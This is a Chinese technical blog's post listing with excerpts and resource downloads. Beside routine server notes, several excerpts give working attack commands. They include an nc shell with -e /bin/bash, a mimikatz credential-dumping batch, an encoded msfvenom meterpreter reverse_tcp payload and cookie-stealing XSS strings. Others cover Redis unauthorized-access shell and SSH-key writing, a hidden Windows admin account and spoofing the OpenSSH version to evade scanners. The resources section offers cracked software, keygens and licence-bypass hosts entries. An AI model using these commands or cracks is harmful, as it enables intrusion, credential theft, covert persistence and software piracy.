自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+

LIVE

摸着石头过河

  • 博客(20)
  • 资源 (9)
  • 收藏
  • 关注

原创 [4K测试视频] 杜比4K UHD蓝光演示碟 Dolby.UHD.BluRay.Demo.Disc.March.2018.2160p.BluRay下载

杜比4K UHD蓝光演示碟Dolby.UHD.BluRay.Demo.Disc.March.2018.2160p.BluRay下载

2022-02-13 00:43:45 18964

原创 Centreon 配置 sendEmail 发送邮件

Centreon后端脚本配置 sendEmail 发送邮件,主要用于将告警信息进行发送

2022-01-13 14:05:55 704

原创 Netcat/nc 备忘

win:https://eternallybored.org/misc/netcat/linux: yum install nc -y常用参数:-l 开启监听-p 指定一个端口-v 显示详细输出-e 指定对应的应用程序-n nc不要DNS反向查询IP的域名-z 连接成功后立即关闭连接-u 指定nc使用UDP协议,默认为TCP-w 超时秒数,后面跟数字服务端:nc -lvp 8888 -e /bin/bash # Linuxnc -lvp ...

2020-07-31 15:59:48 303

原创 Centos 一键升级Openssh版本

Centos 一键升级Openssh版本 该脚本在CentOS 7.6.1810 (Core)x64环境下测试成功 shell远程窗口中直接运行,不会掉线运行前注意检查:① 运行前先本地测试下是否成功!② 检查下脚本中wget下载的文件是否可以完成下载!③ 最后一部修改版本号9.9可以躲过扫描器扫描,按需启用#!/usr/bin/bash#by H Openss...

2020-03-27 12:42:24 996

转载 XSS 跨站测试代码大全2

0x01 XSS介绍1. XSS分类(1) 反射型XSS、(2)存储型XSS、(3)Dom型XSS、(4) 通用型XSS、(全称Universal Cross-Site Scripting,翻译过来就是通用型XSS 简称UXSS) (5) 突变型XSS ( 介绍: mXS()突变 XSS) 是当不可信数据在 DOM 的 innerHTML 属性的上下文被处理并通过浏览器发生突变,...

2019-11-07 17:59:15 1364

转载 在windows下查看某个运行程序(或进程)的命令行参数

使用下面的命令:wmic process get caption,commandline /value如果想查询某一个进程的命令行参数,使用下列方式:wmic process where caption="svchost.exe" get caption,commandline /value这样就可以得到进程的可执行文件位置等信息。...

2019-05-23 16:39:12 5145

原创 mimikatz bat 小记

if %PROCESSOR_ARCHITECTURE%==x86 (cd ./x32) else cd ./x64mimikatz.exe log privilege::debug sekurlsa::logonpasswords exittype mimikatz.log | findstr Passwordpausedel mimikatz.log

2019-05-22 15:09:16 331

原创 CentOS vsftp配置

CentOS vsftp配置yum install vsftpd2.启动/重启/关闭vsftpd服务器[root@localhost ftp]# /sbin/service vsftpd restartShutting down vsftpd: [ OK ]Starting vsftpd for vsftpd: [ OK ]OK表示重启成功了.启动和关闭分别把restart改为s...

2019-04-10 14:19:49 162

原创 Msfvenom

windows:c:\metasploit>msfvenom.bat -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=10.10.10.199 LPORT=3080 -e x86/shikata_ga_nai -i 3 -f exe > c:\2.exec:\metasploit>m...

2019-04-04 16:22:09 1580

原创 Linux记录所有用户history

touch/var/local/mon.logchmod 002 /var/local/mon.logvim /etc/profile 最下方添加下面内容:export HISTORY_FILE=/var/local/mon.logexport PROMPT_COMMAND='{ date "+%Y-%m-%d %T ## `hostname` ## $(who am...

2019-03-25 15:38:31 3347

转载 iptables 备忘

#清除自定义的防火墙规则:iptables-F#清除所有的已定义的规则iptables-X#杀掉所有使用者“自定”的chainiptables-Z...

2019-03-20 16:35:28 117

转载 Github RST 文件

RST与Python类似Javadoc与Java,如果下载了别人的Python源码,里面有rst文件夹,我们可以转为html后用浏览器打开,具体为:安装python的sphinx模块:pip install sphinx,我装的anaconda,其中已经有了,那么在cmd中进入rst的父文件夹,输入:sphinx-build -b html doc builddoc是含有r...

2019-03-13 15:15:15 2380

转载 CentOS 6.9/7通过yum安装指定版本的MySQL

一、安装# wget http://repo.mysql.com/mysql57-community-release-el6.rpm && rpm -ivh mysql57-community-release-el6.rpm# yum install -y mysql-community-server备注:http://repo.mysql.com这个站点上就是放置rpm源...

2019-03-12 16:07:53 211

转载 Linux 删除恢复

1:打开文件分区 dfdebugfs: open /dev/sda12:查看当前文件夹下可以恢复的所有文件列表debugfs: ls -d /home/linux/shl/sy_linux/3:找到对应的参数带入命令debugfs: logdump -i <2165564> -f 34:退出debugfs,开始恢复文件 bs与offset值一致,skip与blo...

2019-02-28 17:59:43 294

转载 APACHE 访问日志切割

日志一直记录总有一天会把整个磁盘占满,所以有必要让它自动切割,并删除老的日志文件把虚拟主机配置文件改成如下:<VirtualHost *:80> DocumentRoot "/data/wwwroot/111.com" ServerName 111.com ServerAlias www.111.com SetEnvIf Request_URI "...

2019-02-27 17:04:31 455

转载 XSS 跨站测试代码大全

'><script>alert(document.cookie)</script>='><script>alert(document.cookie)</script><script>alert(document.cookie)</script><script>alert(vulne

2019-02-26 11:24:34 524

转载 Redis入侵小结

如果远程redis数据库存在未授权访问漏洞,则可以直接上传shell: 开启redis客户端 输入以下命令来连接远程redis redis-cli -h 125.39.185.150 -p 6379 接下来,在远程redis内存中设置数据: config set dir /var/www/html(在内存中设置切换的web目录/var/www/html)...

2019-02-26 11:20:48 345

转载 Redis未授权访问缺陷可轻易导致系统被黑

漏洞概要Redis 默认情况下,会绑定在 0.0.0.0:6379,这样将会将Redis服务暴露到公网上,如果在没有开启认证的情况下,可以导致任意用户在可以访问目标服务器的情况下未授权访问Redis以及读取Redis的数据。攻击者在未授权访问Redis的情况下可以利用Redis的相关方法,可以成功将自己的公钥写入目标服务器的 /root/.ssh 文件夹的authotrized_keys 文件...

2019-02-26 11:13:07 458

转载 关于Redis未授权访问漏洞修复

【漏洞概述】Redis 默认情况下,会绑定在 0.0.0.0:6379,导致Redis服务暴露到公网上。如果在没有开启认证并且在任意用户可以访问目标服务器的情况下,从而可以未授权访问Redis服务,进一步可进行数据增删改查,甚至获取服务器权限等恶意操作。 【风险等级】   高风险 【漏洞风险】主机被远程控制,泄漏敏感业务数据; 【漏洞利用条件】1. Re...

2019-02-26 11:05:42 8270

原创 隐藏Windows中的用户

 方法一:  点击“开始”→“运行”,输入“CMD”运行“命令提示符”,输入“net user 123$ 123456 /add”,回车,成功后会显示“命令成功完成”。接着输入“net localgroup administrators 123$ /add”回车,这样我们就利用“命令提示符”成功得建立了一个用户名为“123$”,密码为“123456”的简单“隐藏账户”,并且把该隐藏账户提升为了

2008-09-02 23:38:00 547

Win2003_x64_snmp包文件.zip

Windows Server 2003 Enterprise SP2 x64 snmp 安装包文件,现在用的应该很少很少了

2019-11-20

乌云内部工具 Extensible Web Attack Framework

传闻中的乌云内部工具 Extensible Web Attack Framework 亲测了下,没有什么太大的惊喜,入门者可以学习下,一个工具而已

2019-04-03

Xshell-6.0.0109r.exe 加 Xftp-6.0.0105r.exe 加 注册机

1.打开C:\Windows\System32\drivers\etc 添加以下内容 127.0.0.1 transact.netsarang.com 127.0.0.1 update.netsarang.com 127.0.0.1 www.netsarang.com 127.0.0.1 www.netsarang.co.kr 127.0.0.1 sales.netsarang.com 2.安装软件 其它信息随便写 注册码 181226-111725-999177 NetSarang_AIO_7in1_Keygen_v1.4_DFoX_URET KEY 生成器, 在安装XFTP的时候用到

2019-02-28

Xshell-6.0.0109r 加 Xftp-6.0.0103 加注册教程

附件为:Xshell-6.0.0109r.exe 与 Xftp-6.0.0103.exe 亲测有效 只要1分 注册方法: 1.打开C:\Windows\System32\drivers\etc 添加以下内容 127.0.0.1 transact.netsarang.com 127.0.0.1 update.netsarang.com 127.0.0.1 www.netsarang.com 127.0.0.1 www.netsarang.co.kr 127.0.0.1 sales.netsarang.com 2.安装软件 其它信息随便写 注册码 181226-111725-999177

2018-12-27

HttpWatch Professional Edition 7.2.13 破解版(带正版lic)

HttpWatch 是强大的网页数据分析工具.集成在Internet Explorer工具栏.包括网页摘要.Cookies管理.缓存管理.消息头发送/接受.字符查询.POST 数据和目录管理功能.报告输出.HttpWatch 是一款能够收集并显示深层信息的软件。它不用代理服务器或一些复杂的网络监控工具,就能够在显示网页同时显示网页请求和回应的日志信息。甚至可以显示浏览器缓存和IE之间的交换信息。集成在Internet Explorer工具栏。

2013-03-30

IBM http请求编辑器(IBM Rational HTTP Request Editor V1.0)

通过录制我们得到了用户行为的协议正文,但这还是无法实现性能测试,接下来需要完成协议回放的过程。服务器无法区分真实用户操作客户端发出的请求和通过工具模拟出的手工请求。这里推荐一个工具--IBM Rational HTTP Request Editor,这个工具是在IBM的Appscan安全工具中免费提供的。 使用这个工具可以手工编写一个HTTP请求来模拟用户进行网页操作,并且在RESPONSE中得到服务器的返回。例如在HOST栏中输入 www.baidu.com ,然后单击Update From Parsed。 模拟一个用户访问Baidu 首页的请求。接着单击Send Raw Request 按钮发送请求,稍等片刻就可以在Response标签中看到服务器的返回了。 对于服务器来说,它并不知道也不在乎你是否真的使用浏览器在访问页面,它只在乎你发送的请求是否符合规范。如果符合了,那么它就返回对应的内容。如果同时开启多个这样的HTTP Request Editor,并且使用进程或者线程的方式来进行管理,就实现了性能测试中最重要的行为模拟和性能负载。

2013-01-04

NetLimiter 3 Pro 正式版破解文件

NetLimiter 3是一款网络限速软件,并且自带防火墙功能强大,可自定义每个程序占用的网速。防火墙虽然不算智能但是可以较为简单控制程序上传下载。 破解方法:直接替换掉安装目录下面的原文件即可.

2011-11-29

冰舞2.5ASP网站漏洞扫描工具

冰舞是一款针对 ASP 脚本网站的扫描工具.它结合扫描和注射为一体,能够很全面的 寻找目标网站存在的漏洞.这里我们花点时间来具体介绍它的使用方法. 一:全站扫描 冰舞 V2.6,可以轻松的寻找到目标网站存在注射和爆库的

2011-05-10

Pangolin_Professinal_Edition_3.2.4.1132_CracKed.rar

Pangolin.CracKed.By.Hmily[LCG][DST].exe MD5: 105ACCED07FF0EBFC7C3C6CBA74F8C02

2011-04-22

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除